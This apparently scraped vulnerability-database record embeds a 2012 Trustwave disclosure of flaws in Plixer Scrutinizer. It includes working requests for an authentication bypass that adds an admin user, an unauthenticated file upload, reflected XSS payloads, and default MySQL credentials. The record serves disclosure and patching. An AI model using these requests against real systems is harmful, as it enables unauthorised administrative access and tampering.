POST /cgi-bin/admin.cgi HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:52:15 GMT Server: Apache Vary: Accept-Encoding Content-Length: 19 Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload vulnerability. An attacker could exploit this vulnerability to upload files to the affected systems file system as well as overwrite the Scrutinizer applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could be overwritten if an attacker were to select the right file name.
Request
POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210
--_Part_949_3365333252_3066945593 Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt" Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
Confirming on File System
C:>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting vulnerabilities in the following pages:
1.) /d4d/contextMenu.php 2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter 3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
Request 1
GET /d4d/exporters.php?aalert(123)=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive
Response 1
/d4d/exporters.php?aalert(123)=1
Request 2
GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: / Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=en&q=aalert(123)=1 Content-Length: 2
Response 2
http://D.E.F.G/search?hl=en&q=aalert(123)=1
Finding 4: Undocumented Default Admin MySQL Users CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP installation which is installed as part of the scrutinizer installer package. The installation of these packages are transparent to the user during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which are not configured by the user which could be easily guessed by an attacker. There is currently no way to change these values within the Scrutinizer application and changing them manually in the MySQL instance has unknown effects on the application due to hardcoded values for some of these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative passwords:
Request
select User,Password from mysql.user;
Response
User |Password root | root | scrutinizer |4ACFE3202A5FF5CF467898FC58AAB1D615029441 scrutremote |4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote' users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update, delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the equivalent of every network interface on the system allowing users with the proper access rights to interact directly with the MySQL instance.
Remediation Steps: Customers should update to the latest version of Scrutinizer NetFlow & sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been corrected in version 9.5.0.
Revision History: 05/02/12 - Vulnerability disclosed 05/16/12 - Patch released by vendor 07/11/12 - Vendor publishes announcement 07/27/12 - Advisory published
References 1. http://www.plixer.com 2. http://blog.spiderlabs.com
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201207-0300",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer with flow analytics module",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.1"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "8.6.2"
},
{
"model": "international scrutinizer",
"scope": "eq",
"trust": 0.3,
"vendor": "plixer",
"version": "9.0.1.19899"
}
],
"sources": [
{
"db": "BID",
"id": "54725"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer_with_flow_analytics_module",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mario Ceballos of the Metasploit Project and Jonathan Claudius of Trustwave Spiderlabs",
"sources": [
{
"db": "BID",
"id": "54725"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
}
],
"trust": 0.9
},
"cve": "CVE-2012-3848",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2012-3848",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-57129",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-3848",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-3848",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201207-592",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-57129",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57129"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. (1) d4d/exporters.php Query string for (2) d4d/exporters.php To HTTP Referer header (3) d4d/contextMenu.php Unspecified input to. Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \nScrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:\nMultiple Vulnerabilities in Scrutinizer NetFlow \u0026 sFlow Analyzer\n\nPublished: 07/27/12\nVersion: 1.0\n\nVendor: Plixer International (http://www.plixer.com)\nProduct: Scrutinizer NetFlow and sFlow Analyzer\nVersion affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions\nmay be affected as well. Please note that the software can be found in a\nlong list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html\nfor the partial list. \n\nProduct description:\nNetwork analysis tool for monitoring the overall network health and reports\non which hosts, applications, protocols, etc. that are consuming network\nbandwidth. \n\nCredits:\nMario Ceballos of the Metasploit Project\nJonathan Claudius of Trustwave Spiderlabs\n\nFinding 1: HTTP Authentication Bypass Vulnerability\nCVE: CVE-2012-2626\n\nThe Scrutinizer web console provides a form-based login facility, requiring\nusers to authenticate to gain access to further functionality. A tiered\nuser access model is also used, where administrative and standard users\nhave a different selection of permissible functions. Authentication and\nauthorization is controlled by the cookie-based session management system. \nAlthough this is implemented in a standardized way, the session tokens are\nnot required to perform privileged functions, such as adding users. \n\nExample(s):\n\nThis request will add a user named \"trustwave\" with the password of\n\"trustwave\" to the administrative user group. \n\n#Request\nPOST /cgi-bin/admin.cgi HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nContent-Length: 70\n\ntool=userprefs\u0026newUser=trustwave\u0026pwd=trustwave\u0026selectedUserGroup=1\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:52:15 GMT\nServer: Apache\nVary: Accept-Encoding\nContent-Length: 19\nContent-Type: text/html; charset=utf-8\n\n{\"new_user_id\":\"2\"}\n\n\nFinding 2: Arbitrary File Upload Vulnerability\nCVE: CVE-2012-2627\n\nThe Scrutinizer web console is prone to unauthenticated arbitrary file upload\nvulnerability. An attacker could exploit this vulnerability to upload files\nto the affected systems file system as well as overwrite the Scrutinizer\napplications SNMP configuration. \n\nExample(s):\n\nThis request will upload a test file to the following location:\n\n\u0027C:\\Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\u0027\n\nNote: This affected folder also contains SNMP configuration files which could\nbe overwritten if an attacker were to select the right file name. \n\n#Request\nPOST /d4d/uploader.php HTTP/1.0\nHost: A.B.C.D\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nContent-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593\nContent-Length: 210\n\n\n--_Part_949_3365333252_3066945593\nContent-Disposition: form-data;\nname=\"uploadedfile\"; filename=\"trustwave.txt\"\nContent-Type: application/octet-stream\n\ntrustwave\n\n--_Part_949_3365333252_3066945593--\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:39:15 GMT\nServer: Apache\nX-Powered-By: PHP/5.3.3\nVary: Accept-Encoding\nContent-Length: 41\nConnection: close\nContent-Type: text/html\n\n{\"success\":1,\"file_name\":\"trustwave.txt\"}\n\n#Confirming on File System\nC:\\\u003etype \"Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\"\ntrustwave\n\n\nFinding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php\nCVE: CVE-2012-3848\n\nThe Scrutinizer web console suffers from multiple Cross Site Scripting\nvulnerabilities in the following pages:\n\n1.) /d4d/contextMenu.php\n2.) /d4d/exporters.php\n\nThese vulnerabilities include the following:\n\n1.) XSS via arbitrary parameter\n3.) XSS via referrer header\n\nExample(s):\n\nThe following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php\n\n#Request 1\nGET /d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1 HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\n\n#Response 1\n\u003csnip\u003e\n\u003ca href=\"/d4d/exporters.php?a\u003cscript\u003ealert(1)\u003c/script\u003e=1\"\u003e/d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\n\u003csnip\u003e\n\n#Request 2\nGET /d4d/exporters.php HTTP/1.1\nHost: A.B.C.D\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\nConnection: close\nReferer: http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\nContent-Length: 2\n\n#Response 2\n\u003csnip\u003e\n\u003ca href=\"http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\n\u003csnip\u003e\n\nFinding 4: Undocumented Default Admin MySQL Users\nCVE: CVE-2012-3951\n\nThe Scrutinizer application relies on an underlying Apache, MySQL and PHP\ninstallation which is installed as part of the scrutinizer installer\npackage. The installation of these packages are transparent to the user\nduring the Scrutinizer installation. \n\nThe installation selects default passwords for internal MySQL Users which\nare not configured by the user which could be easily guessed by an\nattacker. There is currently no way to change these values within the\nScrutinizer application and changing them manually in the MySQL instance\nhas unknown effects on the application due to hardcoded values for some of\nthese accounts. \n\nExample(s):\n\nThe following MySQL command can be run to see the users and their relative\npasswords:\n\n#Request\nselect User,Password from mysql.user;\n\n#Response\nUser |Password\nroot |\nroot |\nscrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\nscrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\n\nNote 1: the above hash shared between the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027\nusers is equivalent to \u0027admin\u0027\n\nNote 2: the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027 users have select, update,\ndelete, create, drop, and more permissions within the MySQL instance. \n\nNote 3: By default, the MySQL instance is bound to \"0.0.0.0\", the\nequivalent of every network interface on the system allowing users with the\nproper access rights to interact directly with the MySQL instance. \n\n\nRemediation Steps:\nCustomers should update to the latest version of Scrutinizer NetFlow \u0026\nsFlow Analyzer in order to address findings 1, 2 and 3. These issues have been\ncorrected in version 9.5.0. \n\nRevision History:\n05/02/12 - Vulnerability disclosed\n05/16/12 - Patch released by vendor\n07/11/12 - Vendor publishes announcement\n07/27/12 - Advisory published\n\nReferences\n1. http://www.plixer.com\n2. http://blog.spiderlabs.com\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-3848"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "BID",
"id": "54725"
},
{
"db": "VULHUB",
"id": "VHN-57129"
},
{
"db": "PACKETSTORM",
"id": "115091"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-57129",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57129"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-3848",
"trust": 2.9
},
{
"db": "BID",
"id": "54725",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "37547",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-57129",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "115091",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57129"
},
{
"db": "BID",
"id": "54725"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"id": "VAR-201207-0300",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-57129"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:35:27.914000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/us/enterprise/p/sonicwall-scrutinizer/pd"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57129"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.plixer.com/press-releases/plixer-releases-9-5-2.html"
},
{
"trust": 2.5,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2012-014.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-3848"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-3848"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/54725"
},
{
"trust": 0.4,
"url": "http://www.plixer.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e"
},
{
"trust": 0.1,
"url": "http://blog.spiderlabs.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.plixer.com/scrutinizer-netflow-sflow/scrutinizer.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3951"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2626"
},
{
"trust": 0.1,
"url": "http://www.plixer.com)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3848"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2627"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57129"
},
{
"db": "BID",
"id": "54725"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-57129"
},
{
"db": "BID",
"id": "54725"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-31T00:00:00",
"db": "VULHUB",
"id": "VHN-57129"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54725"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"date": "2012-07-29T23:22:22",
"db": "PACKETSTORM",
"id": "115091"
},
{
"date": "2012-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"date": "2012-07-31T10:45:42.717000",
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-57129"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54725"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003435"
},
{
"date": "2012-08-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-592"
},
{
"date": "2024-11-21T01:41:45.163000",
"db": "NVD",
"id": "CVE-2012-3848"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
